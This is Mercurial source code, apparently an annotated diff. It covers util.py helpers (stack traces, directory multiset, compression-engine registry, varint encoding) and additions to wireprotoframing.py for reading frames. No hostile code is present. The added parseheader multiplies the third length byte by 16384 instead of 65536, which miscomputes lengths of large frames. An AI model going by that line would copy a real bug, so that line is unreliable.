        self._hooks.sort(key=lambda pair: pair[0])
        return [fn(*args) for _source, fn in self._hooks]
3497 3505
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    # Drop the innermost 'skip' frames plus this function's own frame;
    # [-depth:] with the default depth=0 is [-0:], i.e. all entries.
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        # Width of the widest file:line column, used to align output.
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)
3520 3528
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Write ``msg`` and a nicely formatted stacktrace to f (stderr).

    ``skip`` hides that many frames closest to the call; ``depth`` limits
    how many entries are shown. ``otherf`` (stdout) is flushed first so
    interleaved output stays ordered. It can be used everywhere and
    intentionally does not require an ui object; development aid only.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 also hides this helper's own frame.
    for entry in getstackframes(skip + 1, depth=depth):
        f.write(entry)
    f.flush()
3535 3543
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory -> reference count
        self._dirs = {}
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style mapping: honor the skip state character.
            for f, s in map.iteritems():
                if s[0] != skip:
                    self.addpath(f)
        else:
            for f in map:
                self.addpath(f)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # Invariant: if a directory is present, so are all of its
                # ancestors — bump this one and stop.
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # Still referenced by other paths; ancestors stay too.
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3571 3579
# Prefer the C implementation of dirs from the parsers module when present.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3574 3582
def finddirs(path):
    """Yield each ancestor directory of ``path``, deepest first.

    'a/b/c' yields 'a/b' then 'a'; a path without '/' yields nothing.
    """
    cut = path.rfind('/')
    while cut >= 0:
        yield path[:cut]
        cut = path.rfind('/', 0, cut)
3580 3588
# compression code

# Roles used when querying/advertising wire protocol compression support.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# An engine's wire protocol support declaration: its wire identifier plus
# per-role advertisement priorities (higher advertises first; see
# compressionengine.wireprotosupport()).
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3589 3597
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to engine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises error.Abort if any identifier the engine declares (name,
        bundle name/type, wire type, revlog header) is already taken.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        # Only record the engine once every identifier check has passed.
        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire proto identifier.

        Will raise KeyError if the identifier isn't registered; aborts if
        the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

# The global registry all engines register against.
compengines = compressormanager()
3745 3753
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    # Required.
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    # Optional; defaults to available.
    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    # Optional; ``None`` means no bundle support.
    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    # Optional; ``None`` means no wire protocol support.
    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    # Optional; ``None`` means no revlog support.
    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3862 3870
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        compobj = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            out = compobj.compress(chunk)
            # compress() may buffer input and emit nothing; cheaper to skip
            # empty output here than to feed empty chunks downstream.
            if out:
                yield out

        yield compobj.flush()

    def decompressorreader(self, fh):
        def gen():
            dobj = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Cap output per iteration (256kB) to bound memory use.
                    yield dobj.decompress(chunk, 2 ** 18)
                    chunk = dobj.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # Too small to be worth trying.
                return None

            if insize <= 1000000:
                out = zlib.compress(data)
                return out if len(out) < insize else None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs, in 1MB windows.
            cobj = zlib.compressobj()
            pieces = []
            offset = 0
            while offset < insize:
                end = offset + 2**20
                pieces.append(cobj.compress(data[offset:end]))
                offset = end
            pieces.append(cobj.flush())

            if sum(map(len, pieces)) < insize:
                return ''.join(pieces)
            return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3949 3957
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    def wireprotosupport(self):
        # A wire protocol name is declared, but priority 0 on both sides
        # means it is never advertised by default: bzip2 is slow.
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        compobj = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            out = compobj.compress(chunk)
            # Skip empty output from the compressor's internal buffering.
            if out:
                yield out

        yield compobj.flush()

    def decompressorreader(self, fh):
        def gen():
            dobj = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield dobj.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3992 4000
class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No user-facing bundle spec name: internal identifier only.
        return None, '_truncatedBZ'

    # compressstream is intentionally absent: compression for this type is
    # hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            dobj = bz2.BZ2Decompressor()
            # The input stream lacks the leading 'BZ' magic; prime the
            # decompressor with it before feeding the real data.
            dobj.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield dobj.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
4013 4021
class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Pass-through: the input iterator is returned unmodified.
        return it

    def decompressorreader(self, fh):
        # Pass-through: the file object is returned unmodified.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # ``None`` signals "could not compress"; revlog stores raw data.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
4048 4056
class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        # Available only when the bundled zstd module imported successfully.
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        # Byte marking zstd-compressed revlog chunks.
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            # compress() may buffer and emit nothing; skip empty output.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            # Window sizes recommended by the zstd bindings for streaming.
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small to be worth compressing.
                return None

            elif insize <= 1000000:
                # One-shot compression for moderately sized inputs; only
                # return the result if it actually saved space.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Stream large inputs through the compressor in windows to
                # bound memory use.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
4177 4185
4178 4186 def bundlecompressiontopics():
4179 4187 """Obtains a list of available bundle compressions for use in help."""
4180 4188 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4181 4189 items = {}
4182 4190
4183 4191 # We need to format the docstring. So use a dummy object/type to hold it
4184 4192 # rather than mutating the original.
4185 4193 class docobject(object):
4186 4194 pass
4187 4195
4188 4196 for name in compengines:
4189 4197 engine = compengines[name]
4190 4198
4191 4199 if not engine.available():
4192 4200 continue
4193 4201
4194 4202 bt = engine.bundletype()
4195 4203 if not bt or not bt[0]:
4196 4204 continue
4197 4205
4198 4206 doc = pycompat.sysstr('``%s``\n %s') % (
4199 4207 bt[0], engine.bundletype.__doc__)
4200 4208
4201 4209 value = docobject()
4202 4210 value.__doc__ = doc
4203 4211 value._origdoc = engine.bundletype.__doc__
4204 4212 value._origfunc = engine.bundletype
4205 4213
4206 4214 items[bt[0]] = value
4207 4215
4208 4216 return items
4209 4217
4210 4218 i18nfunctions = bundlecompressiontopics().values()
4211 4219
4212 4220 # convenient shortcut
4213 4221 dst = debugstacktrace
4214 4222
4215 4223 def safename(f, tag, ctx, others=None):
4216 4224 """
4217 4225 Generate a name that it is safe to rename f to in the given context.
4218 4226
4219 4227 f: filename to rename
4220 4228 tag: a string tag that will be included in the new name
4221 4229 ctx: a context, in which the new name must not exist
4222 4230 others: a set of other filenames that the new name must not be in
4223 4231
4224 4232 Returns a file name of the form oldname~tag[~number] which does not exist
4225 4233 in the provided context and is not in the set of other names.
4226 4234 """
4227 4235 if others is None:
4228 4236 others = set()
4229 4237
4230 4238 fn = '%s~%s' % (f, tag)
4231 4239 if fn not in ctx and fn not in others:
4232 4240 return fn
4233 4241 for n in itertools.count(1):
4234 4242 fn = '%s~%s~%s' % (f, tag, n)
4235 4243 if fn not in ctx and fn not in others:
4236 4244 return fn
4237 4245
4238 4246 def readexactly(stream, n):
4239 4247 '''read n bytes from stream.read and abort if less was available'''
4240 4248 s = stream.read(n)
4241 4249 if len(s) < n:
4242 4250 raise error.Abort(_("stream ended unexpectedly"
4243 4251 " (got %d bytes, expected %d)")
4244 4252 % (len(s), n))
4245 4253 return s
4246 4254
4247 4255 def uvarintencode(value):
4248 4256 """Encode an unsigned integer value to a varint.
4249 4257
4250 4258 A varint is a variable length integer of 1 or more bytes. Each byte
4251 4259 except the last has the most significant bit set. The lower 7 bits of
4252 4260 each byte store the 2's complement representation, least significant group
4253 4261 first.
4254 4262
4255 4263 >>> uvarintencode(0)
4256 4264 '\\x00'
4257 4265 >>> uvarintencode(1)
4258 4266 '\\x01'
4259 4267 >>> uvarintencode(127)
4260 4268 '\\x7f'
4261 4269 >>> uvarintencode(1337)
4262 4270 '\\xb9\\n'
4263 4271 >>> uvarintencode(65536)
4264 4272 '\\x80\\x80\\x04'
4265 4273 >>> uvarintencode(-1)
4266 4274 Traceback (most recent call last):
4267 4275 ...
4268 4276 ProgrammingError: negative value for uvarint: -1
4269 4277 """
4270 4278 if value < 0:
4271 4279 raise error.ProgrammingError('negative value for uvarint: %d'
4272 4280 % value)
4273 4281 bits = value & 0x7f
4274 4282 value >>= 7
4275 4283 bytes = []
4276 4284 while value:
4277 4285 bytes.append(pycompat.bytechr(0x80 | bits))
4278 4286 bits = value & 0x7f
4279 4287 value >>= 7
4280 4288 bytes.append(pycompat.bytechr(bits))
4281 4289
4282 4290 return ''.join(bytes)
4283 4291
4284 4292 def uvarintdecodestream(fh):
4285 4293 """Decode an unsigned variable length integer from a stream.
4286 4294
4287 4295 The passed argument is anything that has a ``.read(N)`` method.
4288 4296
4289 4297 >>> try:
4290 4298 ... from StringIO import StringIO as BytesIO
4291 4299 ... except ImportError:
4292 4300 ... from io import BytesIO
4293 4301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4294 4302 0
4295 4303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4296 4304 1
4297 4305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4298 4306 127
4299 4307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4300 4308 1337
4301 4309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4302 4310 65536
4303 4311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4304 4312 Traceback (most recent call last):
4305 4313 ...
4306 4314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4307 4315 """
4308 4316 result = 0
4309 4317 shift = 0
4310 4318 while True:
4311 4319 byte = ord(readexactly(fh, 1))
4312 4320 result |= ((byte & 0x7f) << shift)
4313 4321 if not (byte & 0x80):
4314 4322 return result
4315 4323 shift += 7
4316 4324
4317 4325 ###
4318 4326 # Deprecation warnings for util.py splitting
4319 4327 ###
4320 4328
4321 4329 defaultdateformats = dateutil.defaultdateformats
4322 4330
4323 4331 extendeddateformats = dateutil.extendeddateformats
4324 4332
4325 4333 def makedate(*args, **kwargs):
4326 4334 msg = ("'util.makedate' is deprecated, "
4327 4335 "use 'utils.dateutil.makedate'")
4328 4336 nouideprecwarn(msg, "4.6")
4329 4337 return dateutil.makedate(*args, **kwargs)
4330 4338
4331 4339 def datestr(*args, **kwargs):
4332 4340 msg = ("'util.datestr' is deprecated, "
4333 4341 "use 'utils.dateutil.datestr'")
4334 4342 nouideprecwarn(msg, "4.6")
4335 4343 return dateutil.datestr(*args, **kwargs)
4336 4344
4337 4345 def shortdate(*args, **kwargs):
4338 4346 msg = ("'util.shortdate' is deprecated, "
4339 4347 "use 'utils.dateutil.shortdate'")
4340 4348 nouideprecwarn(msg, "4.6")
4341 4349 return dateutil.shortdate(*args, **kwargs)
4342 4350
4343 4351 def parsetimezone(*args, **kwargs):
4344 4352 msg = ("'util.parsetimezone' is deprecated, "
4345 4353 "use 'utils.dateutil.parsetimezone'")
4346 4354 nouideprecwarn(msg, "4.6")
4347 4355 return dateutil.parsetimezone(*args, **kwargs)
4348 4356
4349 4357 def strdate(*args, **kwargs):
4350 4358 msg = ("'util.strdate' is deprecated, "
4351 4359 "use 'utils.dateutil.strdate'")
4352 4360 nouideprecwarn(msg, "4.6")
4353 4361 return dateutil.strdate(*args, **kwargs)
4354 4362
4355 4363 def parsedate(*args, **kwargs):
4356 4364 msg = ("'util.parsedate' is deprecated, "
4357 4365 "use 'utils.dateutil.parsedate'")
4358 4366 nouideprecwarn(msg, "4.6")
4359 4367 return dateutil.parsedate(*args, **kwargs)
4360 4368
4361 4369 def matchdate(*args, **kwargs):
4362 4370 msg = ("'util.matchdate' is deprecated, "
4363 4371 "use 'utils.dateutil.matchdate'")
4364 4372 nouideprecwarn(msg, "4.6")
4365 4373 return dateutil.matchdate(*args, **kwargs)
@@ -1,156 +1,395 b''
1 1 # wireprotoframing.py - unified framing protocol for wire protocol
2 2 #
3 3 # Copyright 2018 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 # This file contains functionality to support the unified frame-based wire
9 9 # protocol. For details about the protocol, see
10 10 # `hg help internals.wireprotocol`.
11 11
12 12 from __future__ import absolute_import
13 13
14 14 import struct
15 15
16 from .i18n import _
16 17 from . import (
18 error,
17 19 util,
18 20 )
19 21
20 22 FRAME_HEADER_SIZE = 4
21 23 DEFAULT_MAX_FRAME_SIZE = 32768
22 24
23 25 FRAME_TYPE_COMMAND_NAME = 0x01
24 26 FRAME_TYPE_COMMAND_ARGUMENT = 0x02
25 27 FRAME_TYPE_COMMAND_DATA = 0x03
26 28
27 29 FRAME_TYPES = {
28 30 b'command-name': FRAME_TYPE_COMMAND_NAME,
29 31 b'command-argument': FRAME_TYPE_COMMAND_ARGUMENT,
30 32 b'command-data': FRAME_TYPE_COMMAND_DATA,
31 33 }
32 34
33 35 FLAG_COMMAND_NAME_EOS = 0x01
34 36 FLAG_COMMAND_NAME_HAVE_ARGS = 0x02
35 37 FLAG_COMMAND_NAME_HAVE_DATA = 0x04
36 38
37 39 FLAGS_COMMAND = {
38 40 b'eos': FLAG_COMMAND_NAME_EOS,
39 41 b'have-args': FLAG_COMMAND_NAME_HAVE_ARGS,
40 42 b'have-data': FLAG_COMMAND_NAME_HAVE_DATA,
41 43 }
42 44
43 45 FLAG_COMMAND_ARGUMENT_CONTINUATION = 0x01
44 46 FLAG_COMMAND_ARGUMENT_EOA = 0x02
45 47
46 48 FLAGS_COMMAND_ARGUMENT = {
47 49 b'continuation': FLAG_COMMAND_ARGUMENT_CONTINUATION,
48 50 b'eoa': FLAG_COMMAND_ARGUMENT_EOA,
49 51 }
50 52
51 53 FLAG_COMMAND_DATA_CONTINUATION = 0x01
52 54 FLAG_COMMAND_DATA_EOS = 0x02
53 55
54 56 FLAGS_COMMAND_DATA = {
55 57 b'continuation': FLAG_COMMAND_DATA_CONTINUATION,
56 58 b'eos': FLAG_COMMAND_DATA_EOS,
57 59 }
58 60
59 61 # Maps frame types to their available flags.
60 62 FRAME_TYPE_FLAGS = {
61 63 FRAME_TYPE_COMMAND_NAME: FLAGS_COMMAND,
62 64 FRAME_TYPE_COMMAND_ARGUMENT: FLAGS_COMMAND_ARGUMENT,
63 65 FRAME_TYPE_COMMAND_DATA: FLAGS_COMMAND_DATA,
64 66 }
65 67
66 68 ARGUMENT_FRAME_HEADER = struct.Struct(r'<HH')
67 69
68 70 def makeframe(frametype, frameflags, payload):
69 71 """Assemble a frame into a byte array."""
70 72 # TODO assert size of payload.
71 73 frame = bytearray(FRAME_HEADER_SIZE + len(payload))
72 74
73 75 l = struct.pack(r'<I', len(payload))
74 76 frame[0:3] = l[0:3]
75 77 frame[3] = (frametype << 4) | frameflags
76 78 frame[4:] = payload
77 79
78 80 return frame
79 81
80 82 def makeframefromhumanstring(s):
81 83 """Given a string of the form: <type> <flags> <payload>, creates a frame.
82 84
83 85 This can be used by user-facing applications and tests for creating
84 86 frames easily without having to type out a bunch of constants.
85 87
86 88 Frame type and flags can be specified by integer or named constant.
87 89 Flags can be delimited by `|` to bitwise OR them together.
88 90 """
89 91 frametype, frameflags, payload = s.split(b' ', 2)
90 92
91 93 if frametype in FRAME_TYPES:
92 94 frametype = FRAME_TYPES[frametype]
93 95 else:
94 96 frametype = int(frametype)
95 97
96 98 finalflags = 0
97 99 validflags = FRAME_TYPE_FLAGS[frametype]
98 100 for flag in frameflags.split(b'|'):
99 101 if flag in validflags:
100 102 finalflags |= validflags[flag]
101 103 else:
102 104 finalflags |= int(flag)
103 105
104 106 payload = util.unescapestr(payload)
105 107
106 108 return makeframe(frametype, finalflags, payload)
107 109
110 def parseheader(data):
111 """Parse a unified framing protocol frame header from a buffer.
112
113 The header is expected to be in the buffer at offset 0 and the
114 buffer is expected to be large enough to hold a full header.
115 """
116 # 24 bits payload length (little endian)
117 # 4 bits frame type
118 # 4 bits frame flags
119 # ... payload
120 framelength = data[0] + 256 * data[1] + 16384 * data[2]
121 typeflags = data[3]
122
123 frametype = (typeflags & 0xf0) >> 4
124 frameflags = typeflags & 0x0f
125
126 return frametype, frameflags, framelength
127
128 def readframe(fh):
129 """Read a unified framing protocol frame from a file object.
130
131 Returns a 3-tuple of (type, flags, payload) for the decoded frame or
132 None if no frame is available. May raise if a malformed frame is
133 seen.
134 """
135 header = bytearray(FRAME_HEADER_SIZE)
136
137 readcount = fh.readinto(header)
138
139 if readcount == 0:
140 return None
141
142 if readcount != FRAME_HEADER_SIZE:
143 raise error.Abort(_('received incomplete frame: got %d bytes: %s') %
144 (readcount, header))
145
146 frametype, frameflags, framelength = parseheader(header)
147
148 payload = fh.read(framelength)
149 if len(payload) != framelength:
150 raise error.Abort(_('frame length error: expected %d; got %d') %
151 (framelength, len(payload)))
152
153 return frametype, frameflags, payload
154
108 155 def createcommandframes(cmd, args, datafh=None):
109 156 """Create frames necessary to transmit a request to run a command.
110 157
111 158 This is a generator of bytearrays. Each item represents a frame
112 159 ready to be sent over the wire to a peer.
113 160 """
114 161 flags = 0
115 162 if args:
116 163 flags |= FLAG_COMMAND_NAME_HAVE_ARGS
117 164 if datafh:
118 165 flags |= FLAG_COMMAND_NAME_HAVE_DATA
119 166
120 167 if not flags:
121 168 flags |= FLAG_COMMAND_NAME_EOS
122 169
123 170 yield makeframe(FRAME_TYPE_COMMAND_NAME, flags, cmd)
124 171
125 172 for i, k in enumerate(sorted(args)):
126 173 v = args[k]
127 174 last = i == len(args) - 1
128 175
129 176 # TODO handle splitting of argument values across frames.
130 177 payload = bytearray(ARGUMENT_FRAME_HEADER.size + len(k) + len(v))
131 178 offset = 0
132 179 ARGUMENT_FRAME_HEADER.pack_into(payload, offset, len(k), len(v))
133 180 offset += ARGUMENT_FRAME_HEADER.size
134 181 payload[offset:offset + len(k)] = k
135 182 offset += len(k)
136 183 payload[offset:offset + len(v)] = v
137 184
